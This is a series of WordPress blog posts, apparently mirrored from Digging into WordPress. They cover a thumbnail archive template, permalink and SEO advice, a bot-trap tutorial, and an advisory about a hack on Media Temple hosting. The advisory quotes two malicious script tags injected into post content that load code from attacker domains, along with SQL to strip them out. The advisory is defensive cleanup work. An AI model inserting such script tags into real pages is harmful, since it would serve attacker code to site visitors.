Just another Freebytes.eu weblog

DiW v3.0 Book News

We have been working diligently on updating Digging into WordPress and finding the best print-on-demand solution. Thanks to your suggestions and ideas for book printing, there were many options to check out. After sizing things up, we’re pleased to announce the following:

  • Digging into WordPress version 3.0 will be released near the end of August
  • Printed editions of DiW will be available in September

We’re still working out the specifics regarding cost, shipping, and so forth, but the book will be updated soon and printed books are back on the menu. So that’s the plan at this point – no hard promises but rather strong goals for DiW v3.0.

As always, stay tuned for more news!

Like the article? Get the book!


© 2010 Digging into WordPress | Categorized: Site News

Thumbnail Based Archives

Here at Digging Into WordPress, we’ve attached thumbnail images to every single (non-link-style) post since day one. We started before WordPress had a built-in post-thumbnail feature (it arrived in version 2.9), so we simply stored the path to each thumbnail image in a custom field. We display those thumbnails on the homepage and on various other pages where it makes sense.

The biggest reason we decided to attach post thumbnails from the beginning was that it is just an interesting bit of data to have available for every single post. It means that we could do something like display random thumbnails in the sidebar, or display thumbnails next to search results. We don’t do either of those things in this current design, but it’s always a possibility and possibilities are awesome.

Another cool thing you can build with thumbnails is a unique archive view. I’ve built one for us here on Digging Into WordPress, and I have ideas for several more. Check it out:

Read on for the “how”…

1. Create a special page template

This page is totally unique, with no standard header or footer, so I made a template just for it.

<?php
/*
  Template Name: Thumb Archives - Horz
*/
?>

2. Create a horizontal row of thumbs

One of the best ways to create a long horizontal row (one that extends beyond the width of the browser window) is to use a table with a single row of cells. This way we don’t have to set the width of anything manually, and we don’t have to worry about the thumbnails wrapping, as they would if they were inline elements or floated.

So we’ll set up a loop that queries every post on the site except link posts (here, cat=-52 excludes category 52) and outputs a table cell for each one. Inside each cell, an anchor linking to the post contains the title, the thumbnail image, and an excerpt.

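<table id="archives-table">
	<tr>
		<?php // All posts except those in category 52 (excluded with cat=-52)
		query_posts('posts_per_page=-1&cat=-52'); ?>
		<?php if (have_posts()) : while (have_posts()) : the_post(); ?>
		<td>
			<a href="<?php the_permalink(); ?>" class="article-block">
				<span class="title"><?php the_title(); ?></span>
				<?php // Thumbnail path stored in the "PostThumb" custom field ?>
				<img src="<?php echo esc_url(get_post_meta(get_the_ID(), 'PostThumb', true)); ?>" alt="<?php the_title_attribute(); ?>" />
				<span class="ex"><?php the_excerpt(); ?></span>
			</a>
		</td>
		<?php endwhile; endif; ?>
		<?php wp_reset_query(); // restore the page's original query ?>
	</tr>
</table>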

3. Dependencies

We’re going to need a unique CSS file for this. Since this template is completely one-off and doesn’t use the standard header, the <head> element goes right in the template. We’ll link to our own custom CSS file, load jQuery, load the two plugins that make the effect possible (hoverFlow and mousewheel), and finally load our own custom JavaScript file.

<head>
  <meta charset="UTF-8" />
  <title>Thumbnail Archives | Digging Into WordPress</title>
  <link rel="stylesheet" type="text/css" media="all" href="<?php bloginfo("template_url"); ?>/css/archives-horz.css" />
  <script src='http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js'></script>
  <script src='<?php bloginfo("template_url"); ?>/js/jquery.hoverflow.min.js'></script>
  <script src='<?php bloginfo("template_url"); ?>/js/jquery.mousewheel.min.js'></script>
  <script src='<?php bloginfo("template_url"); ?>/js/weirdarchives.js'></script>
</head>

If this page were anything more than a one-off, we should be enqueuing scripts and providing the proper hooks in the header. I’ve deliberately not done that here because this page is its own unique thing, and I don’t want anything else intruding upon it.

4. Style

The styling for the page is very simple: just a repeating background image and some resets. Notice, though, that the titles and excerpts stay hidden until the mouse hovers over a thumbnail. We’ll do the “hiding” by setting the opacity of the titles and excerpts to zero in the CSS. We’ll also position them slightly inset over the thumbnail, so they get a more dramatic “reveal” as they slide out into place on hover.

.title { bottom: 50%; }
.ex { top: 50%; font: 11px Georgia, Serif; color: #555; }
.title, .ex { background: white; width: 130px; padding: 10px; display: block; overflow: hidden; position: absolute; opacity: 0; }

5. Horizontal scrolling

With the mousewheel plugin in place, we can make the mouse scroll wheel scroll the window horizontally instead of vertically:

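$(function() {
    // Runs on DOM ready: this script is loaded in the <head>, before <body> exists
    $("body").mousewheel(function(event, delta) {
        // delta is positive when scrolling up, negative when scrolling down
        this.scrollLeft -= (delta * 30);
        event.preventDefault(); // stop the default vertical scroll
    });
});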

6. Animation

When a thumbnail is hovered over, its title and excerpt fade in and slide out into place: the title moves up above the thumbnail and the excerpt moves down below it. To do that, I’m using jQuery’s hover function, which accepts one function to run on mouseenter and another to run on mouseleave. On mouseenter, an animation changes the position, height, and opacity; on mouseleave, those values return to where they started.

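// $blocks (defined elsewhere in the script) holds the .article-block links;
// each .title and .ex is assumed to have its natural height saved in data("origHeight")
$blocks.hover(function(e) {
    var $el    = $(this),
        $title = $el.find(".title"),
        $ex    = $el.find(".ex");

    // mouseenter: fade in, slide the title up and the excerpt down
    $title.hoverFlow(e.type, { bottom: "99%", opacity: 1, height: $title.data("origHeight") });
    $ex.hoverFlow(e.type, { top: "95.5%", opacity: 1, height: $ex.data("origHeight") });

}, function(e) {
    // mouseleave: return both elements to their hidden starting state
    $(this)
        .find(".title").hoverFlow(e.type, { bottom: "50%", opacity: 0, height: 0 })
        .end()
        .find(".ex").hoverFlow(e.type, { top: "50%", opacity: 0, height: 0 });
});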

There is a bit more to the JavaScript (but not much); feel free to poke around the demo page to see all of it.

7. More

The point of all this was to create a unique archive-browsing experience built around our thumbnails. This isn’t the only way to do it; in fact, I have a few other ideas I’m going to work on in time. Are they super practical? Maybe not, but they are fun!

Categorized: Design

Optimizing WordPress Permalinks

Configuring your WordPress permalinks is simple and only takes a second, but understanding what they are and how they work is key to setting up the best permalink structure possible. Your site’s permalinks are like the street address for your site’s web pages. They help both people and robots understand your site’s structure and navigate its contents. There is no “one magic permalink recipe to rule them all,” but keeping a few tips in mind makes it easy to optimize your WordPress permalinks. This DiW article shows you how..

WordPress makes it so easy

WordPress gives you full control over your permalinks. First, you have control over the general structure of your permalinks. Navigate to Settings > Permalinks and you will see several options for configuring your permalinks:

[ Screenshot: WP Permalink Settings ]

This is where you configure the general structure of your permalinks, as seen here underlined in green. The portion underlined in red is post/page-specific and will vary depending on your individual posts and pages. For DigWP.com, we chose the “month and name” format, which creates the following permalinks for each type of page:

  • Pages: http://digwp.com/about/
  • Tag Archives: http://digwp.com/tag/permalinks/
  • Category Archives: http://digwp.com/category/seo/
  • Single Posts: http://digwp.com/2010/05/wordpress-json-api-plugin/

..and so on. The main thing that you want to optimize at this point is the structure of your single-post permalinks. We chose to include the year and month for our posts, but it has been argued that it is better to omit the date entirely, using a “Custom structure” like so:

/%postname%/

This simple structure will produce single-post permalinks that include only the post name:

http://digwp.com/wordpress-json-api-plugin/

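Without the additional date information, this structure is definitely shorter and cleaner, but there may be performance issues with the “name-only” format. Because %postname% is a text field, starting the structure with it (as with %category%, %tag%, or %author%) makes it harder for WordPress to tell post URLs apart from page URLs, and WordPress compensates by storing a lot of extra rewrite information, which has caused trouble for sites with many pages. Perhaps a good trade-off is to include either the post ID or the year: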

/%post_id%/%postname%/
/%year%/%postname%/

I think either of these formats is probably an optimal way to configure your permalinks, but you also want to consider the frequency with which you’ll be posting content. It may be beneficial to further organize/classify your posts by including the month and day as well.
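To make the difference between these structures concrete, here is a rough JavaScript sketch that expands a structure string into the URL path for a single post. It is not WordPress’s own code: the `expandStructure` function and the post object’s fields are hypothetical, the post ID and date are invented for illustration, and only five of the real structure tags (%year%, %monthnum%, %day%, %post_id%, %postname%) are handled.

```javascript
// Hypothetical sketch: expand a WordPress-style permalink structure for one post.
// Only a few structure tags are supported; WordPress itself handles many more.
function expandStructure(structure, post) {
  const pad = (n) => String(n).padStart(2, "0");
  const tags = {
    "%year%": String(post.date.getUTCFullYear()),
    "%monthnum%": pad(post.date.getUTCMonth() + 1),
    "%day%": pad(post.date.getUTCDate()),
    "%post_id%": String(post.id),
    "%postname%": post.slug,
  };
  // Replace each %tag% with its value; unknown tags are left untouched.
  return structure.replace(/%[a-z_]+%/g, (tag) => tags[tag] ?? tag);
}

const post = {
  id: 77, // invented ID
  slug: "wordpress-json-api-plugin",
  date: new Date(Date.UTC(2010, 4, 18)), // invented date: 18 May 2010 (months are 0-based)
};

console.log(expandStructure("/%year%/%monthnum%/%postname%/", post)); // "/2010/05/wordpress-json-api-plugin/"
console.log(expandStructure("/%postname%/", post));                    // "/wordpress-json-api-plugin/"
console.log(expandStructure("/%post_id%/%postname%/", post));          // "/77/wordpress-json-api-plugin/"
console.log(expandStructure("/%year%/%postname%/", post));             // "/2010/wordpress-json-api-plugin/"
```

Same post, four structures: the only thing that changes is how much date or ID information sits in front of the slug.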

Certain “experts” will tell you that including extraneous date information is bad for SEO. The thinking here is that shorter URLs correspond to a more “flat” directory structure, which may provide some SEO benefits. I think the key is to use what’s necessary and omit any extraneous information.

Post/page-specific permalink structures (slugs!)

Once you’ve defined the general permalink structure in the WordPress Admin, you now have full control over your post-specific and page-specific permalink structures (as seen in the above screenshot, red underline). The part of your permalinks that is specific to each page or post is set in the Write/Edit Post screen in the WordPress Admin.

[ Screenshot: WordPress Post Slugs ]

As shown in the above screenshot, WordPress provides an “Edit” button that enables you to modify the post-specific portion of your permalinks:

[ Screenshot: Editing Post Slugs ]

This feature enables you to customize your post/page-specific permalinks (also known as a post “slug”) according to your current permalink optimization strategy. Here are a few examples of commonly employed “post-slug” strategies:

Don’t even worry about it
Just let WordPress generate the post-specific slug based on the post or page title. Pros: this is certainly the easiest method of creating permalinks because no thought or action is required. Cons: depending on your post title, you could get some pretty long permalinks that look awkward and sloppy.
Remove extraneous words, leave only keywords
I have seen lots of blogs do this. It involves taking the permalink that WordPress generates from your title and removing filler words like “the”, “and”, and “you” (articles, conjunctions, pronouns, and so on). The idea is to leave only keywords in your permalinks, which keeps them short, focused, and optimized for the search engines.
Customize every permalink with optimized keywords
This is the most labor-intensive strategy, but also potentially the most lucrative in terms of return on investment. The idea is to research or otherwise understand which keywords your page is going to rank for, and then craft a post-specific permalink based on those keywords. I have seen cases where this is taken to such an extreme that the post slug is completely different from the original post title.

The same goes for both posts and pages, regardless of which method you choose. Personally, I employ a combination of the first two strategies, whereby I go in, write a title, and then look at it and see if there is anything that could be improved. Usually there are several words that need to go, and possibly a keyword or two is added or removed. It’s funny because I usually end up rewriting some of the post content after spending some time actually thinking about what to name it.

There is always a better title than the one you think should be used.

The take-home message here is that, by paying attention to post titles and permalinks, you benefit from improved relevancy and potential SEO advantage.

Think of your users

When visitors land on your page, does the URL make sense? Does it correlate with the page title? These are some of the things to think about while setting up the general structure and post-specific slugs for your permalinks. Look at the permalink and ask yourself if it makes complete sense based on what the user will be looking at on the page. If you get too carried away with optimization, a user may get a sense that something isn’t quite right. Perhaps the post title says something like:

The Best Name-Brand Shoes

..but then the post slug looks something like this:

http://example.com/nike-adidas-reebok-zip-converse-shoes/

Perhaps a weak example, but it serves to illustrate the semantic gap that may occur when over-thinking your permalinks.

Think of the search engines

After considering your users, think about what the search engines are going to see when they come crawling your pages. Does the permalink match the content of the page? If you aren’t bothering with changing or optimizing your post slugs, then the answer is probably yes because WordPress generates the slug from the post title.

Also, as mentioned previously, some have argued in favor of a more “flat” directory structure in order to improve the SEO value of your blog. Whether or not this is actually the case is up for discussion, but it always makes sense to keep things as simple and concise as possible. So when deciding on the general structure for your permalinks, ask yourself if you really need a directory structure that is over three levels deep, like this:

domain/
    2010/
        01/
            1/
                post-slug-1
                post-slug-2
                post-slug-3
            2/
                post-slug-4
                post-slug-5
                post-slug-6
            3/
                post-slug-7
                post-slug-8
                post-slug-9
        .
        .
        .
    2011/
    2012/

That’s going to give you some long permalinks, especially if you just use the default WordPress-generated slugs. A permalink in “year/month/day/name” format essentially creates a virtual folder structure with a subdirectory for each part of the permalink: the year is a directory containing a directory for each month, and each of those could contain as many as 31 subdirectories, one for each day of the month. Then, within each day, you have the post itself, which may involve further subdirectories when paging is used. It can get crazy pretty quickly, and even though these subdirectories exist only virtually, to a search spider there is no practical difference between deeply nested virtual directories and deeply nested actual directories.
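A quick way to compare how “deep” different structures are is to count the path segments in the URLs they produce. The JavaScript sketch below does just that; `pathDepth` is a hypothetical helper, and example.com stands in for your own domain.

```javascript
// Hypothetical helper: count the "virtual directory" levels in a permalink.
function pathDepth(permalink) {
  const { pathname } = new URL(permalink);
  // Split on "/" and drop the empty strings left by leading/trailing slashes.
  return pathname.split("/").filter(Boolean).length;
}

const examples = [
  "http://example.com/2010/01/1/post-slug-1/", // year/month/day/name
  "http://example.com/2010/post-slug-1/",      // year/name
  "http://example.com/post-slug-1/",           // name only
];

for (const url of examples) {
  console.log(pathDepth(url), url);
}
// Prints 4, 2, and 1 respectively, each followed by its URL.
```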

When deciding on your permalink structure, ask yourself if you really need the date built into your permalinks. If you are posting prolifically, then you may want to include the date to help keep things organized. Anything less than a few posts a week, and I would opt to go with something simpler, like maybe “year/post” or “id/post”, as mentioned above.

Another thing that needs considering is the notion of “evergreen content”, which generally refers to content that is intended to stay “fresh” or relevant forever. Regardless of how silly this SEO idea happens to be, you may want to either omit or include some sort of date information, depending on how easily you want visitors to recognize the publication date. I.e., if you are trying to “hide” the post date in hopes that your content will rank for a longer period of time, then you should omit it from the general permalink structure. Conversely, if you aren’t that slimy and want to make it easy for people to know when the post was produced, then throw a year or year/month into the mix. Whatever!

Think simplicity

When it comes to organizing the content of your site, there is a fine balance between being well-organized and keeping things simple. For example, the simplest structure would put all posts and pages directly under the root domain. Clean and simple, but as time goes on and your post count gets into the hundreds or thousands, it could be a drag trying to sort through everything in a flat directory structure. That’s another reason why breaking things down into categories or dates may help your long-term organization and maintenance strategy.

For the post-specific portion of the permalinks (the post slug), it is also wise to keep things simple, but not at the risk of duplicating post names. For example, if you are writing a post about jQuery, you might use a post slug that is simply “jquery”, but it’s not going to be very helpful. First, it will probably never rank for that term. Second, telling users that the article is about “jQuery” is about as uninformative as it gets, for both people and machines. So although that would be the simplest permalink possible, it is in your interest to describe the content of your post a little more specifically. Everything is easier when the meaning is readily apparent from your permalinks.

Do it before posting

Once you hit the “Publish” button, there is one thing that you shouldn’t change: the post slug. After publishing a post, you can easily and without consequence go back and change the title, meta title, post content, and just about everything else. But as soon as you change the permalink, you will need to 301-redirect the former URL to the new one to avoid 404 errors now and in the future. If you do need to change the permalink after posting, here is a simple line of HTAccess to help you eliminate any potential 404 errors:

Redirect 301 /old-post-slug/ http://example.com/new-post-slug/

So it’s really very simple: we call the Redirect directive, declare it as status 301 (permanent), and then add the old path followed by the full new URL. That line will redirect any requests for your previously “slugged” URL to your new URL.
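If you end up changing several slugs, writing those lines by hand gets tedious. Here is a small JavaScript sketch that generates one Redirect 301 line per changed slug; `redirectLines`, the slugs, and example.com are placeholders, and you would still paste the output into your .htaccess file yourself.

```javascript
// Hypothetical helper: build mod_alias "Redirect 301" lines for changed slugs.
function redirectLines(siteUrl, changes) {
  const base = siteUrl.replace(/\/+$/, ""); // drop any trailing slash from the site URL
  return Object.entries(changes).map(
    ([oldSlug, newSlug]) => `Redirect 301 /${oldSlug}/ ${base}/${newSlug}/`
  );
}

const lines = redirectLines("http://example.com/", {
  "old-post-slug": "new-post-slug",
  "another-old-slug": "another-new-slug",
});
console.log(lines.join("\n"));
// Redirect 301 /old-post-slug/ http://example.com/new-post-slug/
// Redirect 301 /another-old-slug/ http://example.com/another-new-slug/
```

Because mod_alias’s Redirect matches by path prefix, each line also carries along anything that follows the old path, so a request for /old-post-slug/page/2/ ends up at /new-post-slug/page/2/.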

Think of the keywords

As discussed, a great way to create focused, relevant permalinks is to remove the fluff and include only the important keywords. Granted, Google et al. may already discount simple words such as “if”, “and”, and “the”, but you may also have keywords for which you don’t necessarily want to rank. For example, if you published a post on why Batman is terrible at website design, you may wind up with an auto-generated post slug like this:

batman-sucks-at-website-design

The word “at” should probably go, leaving this:

batman-sucks-website-design

But you may want to rank primarily for the term “website design”, while “batman” is merely anecdotal, used as an example, or whatever. Chances are low that anybody is searching for “batman website design”, but you never know.
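Trimming filler words can be partly automated. The JavaScript sketch below drops a small, hand-picked list of stop words from a slug; the `STOP_WORDS` list and the `trimSlug` name are assumptions for illustration, not something WordPress does for you.

```javascript
// Hypothetical stop-word list; adjust to taste (and to your language).
const STOP_WORDS = new Set(["a", "an", "and", "at", "for", "in", "of", "on", "the", "to", "you"]);

// Remove stop words from a hyphenated slug, keeping the remaining words in order.
function trimSlug(slug) {
  return slug
    .split("-")
    .filter((word) => word !== "" && !STOP_WORDS.has(word))
    .join("-");
}

console.log(trimSlug("batman-sucks-at-website-design")); // "batman-sucks-website-design"
```

A blind filter like this can’t tell when a “stop word” belongs to a keyword phrase, or decide that “batman” is the word worth dropping, so the result still deserves a look by hand.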

WordPress removes stuff too

It should also be noted that WordPress removes certain things from your post/page slugs as well. Namely, any punctuation that is included in your post titles will be removed when WordPress automatically generates the post slug. This is both a good thing and a bad thing, depending on how you look at it. There are certain characters that are not allowed in any URL, so WordPress is wise to remove them for you. On the downside, the removal of punctuation and the use of hyphens as replacements for periods can leave you with some rather odd-looking permalinks. For example, if you are writing about a WordPress update, say version 3.1 specifically, using this as your title:

Introducing WordPress 3.1

..will give you this as the default post slug:

/introducing-wordpress-3-1/

..which to me just looks incorrect, like somebody wasn’t paying attention. Moral of the story: even if you’re too lazy to optimize your permalink slugs, it is wise to be mindful of what’s going on with the auto-generated ones. In this regard, the WordPress devs made an excellent decision when they moved the permalink edit box to just below the post title. I do think it could be a little wider, though: most of the time you need to scroll sideways a bit to see the entire permalink.
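To see where slugs like /introducing-wordpress-3-1/ come from, here is a simplified JavaScript approximation of the title-to-slug conversion described above. It is a sketch, not WordPress’s actual sanitize_title code: `approximateSlug` is a hypothetical name, it assumes plain ASCII titles, and it only covers lowercasing, turning periods and whitespace into hyphens, and dropping other punctuation.

```javascript
// Simplified approximation of WordPress's automatic title-to-slug conversion.
// Assumes ASCII input; WordPress also handles accents, HTML entities, and more.
function approximateSlug(title) {
  return title
    .toLowerCase()
    .replace(/\./g, "-")          // periods become hyphens ("3.1" -> "3-1")
    .replace(/[^a-z0-9\s-]/g, "") // drop other punctuation
    .trim()
    .replace(/[\s-]+/g, "-")      // runs of spaces/hyphens become one hyphen
    .replace(/^-+|-+$/g, "");     // no leading or trailing hyphens
}

console.log(approximateSlug("Introducing WordPress 3.1"));       // "introducing-wordpress-3-1"
console.log(approximateSlug("Batman Sucks at Website Design!")); // "batman-sucks-at-website-design"
```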

WordPress short URLs

What about Twitter-friendly “shortlinks” for your posts? Generally even the shortest permalink is going to be too long for tweeting, posting, sharing, etc. There are many ways to create short links, but WordPress actually has two built-in ways to create and display short URLs. Let’s take a look at each:

First is the “old” way of doing it. By default, WordPress uses a query-string format for your URLs. As discussed throughout this article, most WordPress users opt for the “pretty” permalinks instead of going with the “ugly” default URLs. But even when permalinks are used, WordPress still understands the default query-string URL structure, so you can include short links in your posts by doing something like this:

<?php echo get_bloginfo('url')."/?p=".$post->ID; ?>

Shortlinks have become so common that WordPress 3.0 now includes a built-in template tag for this very purpose. To display shortlinks in WordPress 3.0 and above, all you need to do is include the following code in your theme template file(s):

<?php the_shortlink('link text', 'link title', 'before link', 'after link'); ?>

Both of these methods produce a URL with the following structure:

http://example.com/?p=77
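The query-string shortlink is simple enough to build, or take apart, anywhere. Here is a JavaScript sketch that mirrors the PHP one-liner above and reads the post ID back out of a shortlink; `makeShortlink` and `postIdFromShortlink` are hypothetical helpers, and example.com and the ID 77 are placeholders.

```javascript
// Hypothetical helper mirroring get_bloginfo('url') . "/?p=" . $post->ID
function makeShortlink(homeUrl, postId) {
  return `${homeUrl.replace(/\/+$/, "")}/?p=${postId}`;
}

// Hypothetical helper: pull the numeric post ID back out of a shortlink.
function postIdFromShortlink(link) {
  const id = new URL(link).searchParams.get("p");
  return id === null ? null : Number(id);
}

console.log(makeShortlink("http://example.com", 77));         // "http://example.com/?p=77"
console.log(postIdFromShortlink("http://example.com/?p=77")); // 77
```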

Also note that WordPress 3.0 now includes a shortlink in the <head> section of your posts and pages, something like this:

<link rel='shortlink' href='http://example.com/?p=77' />

This is in addition to the canonical link tag that is also included in the <head> section.

WordPress canonical links

WordPress canonical URLs are included in the <head> section of your posts and pages. They look like this:

<link rel='canonical' href='http://example.com/post-slug/' />

These canonical links help the search engines better understand the structure and content of your site. By including the canonical element in your pages, you are telling Google et al. which pages are the actual, canonical pages for your site. There are several cases where this is extremely helpful, namely:

  • Social media linking often involves shortlinks – specifying a canonical link helps ensure that all of the shortlinking is sorted out and that your actual page gets the credit
  • Shopping cart sites that feature lots of query-string URLs – when many links look practically identical, having a canonical link specified helps to sort things out
  • Guest posting and other duplicate content – when your content is featured (or scraped) in multiple places around the Web, it is nice to have a clear signal as to which version is canonical

You don’t need htaccess to make changes

What if you want to change the general structure of your permalinks? How do you go about doing that without losing your page rank or creating a mess of 404 errors? In older versions of WordPress, this was a real concern. Many folks began with full-date permalinks and then later realized they wanted cleaner, shorter, “dateless” permalinks instead. To do this back in the day, some HTAccess trickery was required to keep the old links from going nowhere.

Fortunately, those days are long gone, as WordPress now automagically handles all the redirecting for you when you change the general structure of your permalinks (via the Settings > Permalinks options in the WordPress Admin). All you need to do is change the setting to whatever structure you would like, and WordPress takes care of the rest. Just remember to back up your database and htaccess file before making any changes.

Categorized: SEO

Media Temple WordPress Hack

It looks like Media Temple WordPress installs have been hit with a WordPress Redirect Exploit. We got hit here at DigWP.com, but have cleaned things up and are taking steps to prevent it from happening again. Here is what Media Temple knows so far:

  • Visitors viewing posts on your blog may be redirected to a third-party site. This may be a site already blocked by Google.
  • Visitors may also be forwarded to the domain googlesearch.com, which has already been disabled.

They provide steps for clearing things up, but it doesn’t look like the entry-point or source of this hack is known at this point.

The hack injects a short JavaScript string into your database at the end of each of your posts’ content. There are (so far) two known variations of the inserted garbage:

  • <script src="http://ae.awaue.com/7"></script>
  • <script src="http://ie.eracou.com/3"></script>

To clean this up ASAP, back up your database and run the following SQL queries:

UPDATE wp_posts SET post_content = replace(post_content, '<script src="http://ae.awaue.com/7"></script>', '');

UPDATE wp_posts SET post_content = replace(post_content, '<script src="http://ie.eracou.com/3"></script>', '');

And remember to change the table prefix from wp_ to your own if you use a custom prefix.
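Before running the UPDATE queries, you might want to see which posts are actually affected. Here is a JavaScript sketch of the same cleanup applied to a single post_content string, for example against an exported copy of your posts; `INJECTED`, `cleanContent`, and `isInfected` are hypothetical names, and only the two known variants listed above are handled.

```javascript
// The two known injected strings reported for this hack.
const INJECTED = [
  '<script src="http://ae.awaue.com/7"></script>',
  '<script src="http://ie.eracou.com/3"></script>',
];

// Mirror of SQL REPLACE(post_content, needle, ''): remove every occurrence.
function cleanContent(content) {
  return INJECTED.reduce((text, needle) => text.split(needle).join(""), content);
}

// True if the content contains either known injection.
function isInfected(content) {
  return INJECTED.some((needle) => content.includes(needle));
}

const sample = '<p>Hello world.</p><script src="http://ae.awaue.com/7"></script>';
console.log(isInfected(sample));   // true
console.log(cleanContent(sample)); // "<p>Hello world.</p>"
```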

Categorized: Security

GPL Showdown

If you missed the live Matt Mullenweg vs. Chris Pearson debate today, this is my wrap-up:

Matt: Thesis is violating the law because it violates GPL.
Chris: No it isn’t.

Matt: Businesses can thrive under GPL.
Chris: So?

Matt: Why won’t you bring Thesis over to GPL?
Chris: Because I would feel like I’m doing something against my personal beliefs.

Matt: We might sue you.
Chris: Bring it on.

It was interspersed with various (what I felt to be) personal attacks and chest thumping. No conclusion was reached.

As for me, I don’t know enough to have super strong opinions on all this. I do know that I’d way rather be friendly with the WordPress community and its founding fathers than at odds, so if Matt asked me to do something, I’d generally just do it. Hey, that’s why the domain of this site is digwp.com and not diggingintowordpress.com.

Categorized: Site News

Protect Your Site with a Blackhole for Bad Bots

[ Black Hole ] One of my favorite security measures here at Perishable Press is the site’s virtual Blackhole trap for bad bots. The concept is simple: include a hidden link to a robots.txt-forbidden directory somewhere on your pages. Bots that ignore or disobey your robots rules will crawl the link and fall into the trap, which then performs a WHOIS Lookup and records the event in the blackhole data file. Once added to the blacklist data file, bad bots immediately are denied access to your site. I call it the “one-strike” rule: bots have one chance to follow the robots.txt protocol, check the site’s robots.txt file, and obey its directives. Failure to comply results in immediate banishment. The best part is that the Blackhole only affects bad bots: normal users never see the hidden link, and good bots obey the robots rules in the first place.

In five easy steps, you can set up your own Blackhole to trap bad bots and protect your site from evil scripts, bandwidth thieves, content scrapers, spammers, and other malicious behavior.

[ Blackhole Directory with Files ] The Blackhole is built with PHP, and uses a bit of .htaccess to protect the blackhole directory. The blackhole script combines heavily modified versions of the Kloth.net script (for the bot trap) and the Network Query Tool (for the whois lookups). Refined over the years and completely revamped for this tutorial, the Blackhole consists of a single plug-&-play directory that contains the following four files:

  • .htaccess – basic directory protection
  • blackhole.dat – server-writable log file (serves as the blacklist)
  • blackhole.php – checks requests against blacklist and blocks bad bots
  • index.php – generates blackhole page, performs whois lookup, sends email, and logs data

These four files are all contained in a single directory named “blackhole”.

Installation Overview

I set things up to make implementation as easy as possible. Here are the five basic steps:

  1. Upload the /blackhole/ directory to your site
  2. Ensure writable server permissions for the blackhole.dat file
  3. Add a single line to the top of your pages to include the blackhole.php file
  4. Add a hidden link to the /blackhole/ directory in the footer of your pages
  5. Prohibit crawling of the /blackhole/ by adding a line to your robots.txt file

It’s that easy to install on your own site, but there are many ways to customize functionality. For complete instructions, jump ahead to Implementation and Configuration. For now, I think a good way to understand how it works is to check out a demo..

One-time Live Demo

I have set up a working demo of the Blackhole for this tutorial. It works exactly like the download version, but it’s configured to block you only from the demo, not from the entire site. Here’s how it works:

  1. First visit to the Blackhole demo loads the trap page, runs the whois lookup, and adds your IP address to the blacklist data file
  2. Once you’re added to the blacklist, all subsequent requests for the Blackhole demo will be denied access

So you get one chance to see how it works. Once you visit, your IP will be blocked from the demo only – you will still have full access to this tutorial (and everything else). That said, here is the demo link: Blackhole Demo. Visit once to see the Blackhole trap, and then again to observe that you’ve been blocked. If I were to include the blackhole.php in the header of my theme files, you would be banned from pretty much the entire site.

Implementation and Configuration

Here are complete instructions for implementing and configuring the Perishable Press Blackhole:

Step 1: Download the Blackhole zip file, unzip and upload to your site’s root directory. This location is not required, but it enables everything to work out of the box. To use a different location, edit the include path in Step 3.

Step 2: Change file permissions for blackhole.dat to make it writable by the server. The appropriate permission settings may vary depending on server configuration; if you are unsure, ask your host. Note that the blackhole script needs to be able to read and write the blackhole.dat file (execute permission isn’t needed for a data file).

Step 3: Include the bot-check script by adding the following line to the top of your pages:

<?php include($_SERVER['DOCUMENT_ROOT'] . "/blackhole/blackhole.php"); ?>

The blackhole.php script checks the request IP against the blacklist data file. If a match is found, the request is blocked with a customizable message. See the source code for more information.
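The check itself boils down to “is this IP in the list?” Here is a JavaScript sketch of that idea. It is not the actual blackhole.php logic: the real blackhole.dat format may differ, and this sketch assumes each line starts with an IP address followed by other logged details separated by spaces; `parseBlacklist`, `isBlocked`, and the sample entries (documentation-range IPs) are hypothetical.

```javascript
// Hypothetical sketch of the blacklist check. Assumes each line of the data
// file begins with an IP address, followed by other space-separated details.
function parseBlacklist(datText) {
  const ips = new Set();
  for (const line of datText.split("\n")) {
    const ip = line.trim().split(/\s+/)[0];
    if (ip) ips.add(ip); // skip blank lines
  }
  return ips;
}

function isBlocked(requestIp, blacklist) {
  return blacklist.has(requestIp);
}

const dat = "203.0.113.7 2010-06-01 BadBot/1.0\n198.51.100.23 2010-06-02 Scraper/2.1\n";
const blacklist = parseBlacklist(dat);
console.log(isBlocked("203.0.113.7", blacklist)); // true
console.log(isBlocked("192.0.2.1", blacklist));   // false
```

Loading the entries into a Set keeps each lookup cheap, even as the blacklist grows.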

Step 4: Include a hidden link to the /blackhole/ directory in the footer of your pages:

<a style="display:none;" href="http://example.com/blackhole/" rel="nofollow">Do NOT follow this link or you will be banned from the site!</a>

This is the hidden link that bad bots will follow. It’s currently hidden with CSS, so 99% of visitors won’t ever see it. To hide the link from users without CSS, replace the anchor text with a transparent 1-pixel GIF image.

Step 5: Finally, add a Disallow directive to your site’s robots.txt file:

User-agent: *
Disallow: /blackhole/

This step is pretty important. Without the proper robots directives, all bots would fall into the Blackhole because they wouldn’t know any better. If a bot wants to crawl your site, it must obey the rules! The robots rule that we are using tells all bots not to visit the /blackhole/ directory or anything inside of it. If you installed the Blackhole somewhere other than the root directory, adjust the path to match. More on this in the next section.
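To confirm that a robots.txt rule really covers the trap, you can test it with Python's standard-library `urllib.robotparser`. That parser does plain prefix matching without `*` wildcards, so it approximates a simple but rule-abiding crawler; wildcard support varies between crawlers, which is a good reason to prefer a plain prefix rule. The sketch assumes the Blackhole lives at /blackhole/ on example.com; `is_allowed` and `ROBOTS_TXT` are illustrative names.

```python
from urllib.robotparser import RobotFileParser

# Assumed robots.txt contents: the simple prefix form of the rule.
ROBOTS_TXT = """\
User-agent: *
Disallow: /blackhole/
"""


def is_allowed(url: str, user_agent: str = "ExampleBot", robots_txt: str = ROBOTS_TXT) -> bool:
    """Return True if a crawler that obeys robots.txt may fetch `url`."""
    parser = RobotFileParser()
    # parse() accepts the file's lines directly, so no network access is needed.
    parser.parse(robots_txt.splitlines())
    return parser.can_fetch(user_agent, url)


for url in ("http://example.com/",
            "http://example.com/blackhole/",
            "http://example.com/blackhole/index.php"):
    print(url, is_allowed(url))
# http://example.com/ True
# http://example.com/blackhole/ False
# http://example.com/blackhole/index.php False
```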

Further customization: The previous five steps will get the Blackhole working, but the Blackhole’s index.php file needs a few modifications. Open index.php and make the following changes:

  • Line #54: Edit the path to your site’s robots.txt file
  • Line #56: Edit the path to your contact page (or email address)
  • Lines #140/141: Replace the email address with your own
  • In blackhole.php, edit line #53 with your contact info

These are the recommended changes, but the PHP is clean and generates valid HTML5, so feel free to modify the source code as needed. Beyond these items, no other edits are needed.

Caveat Emptor

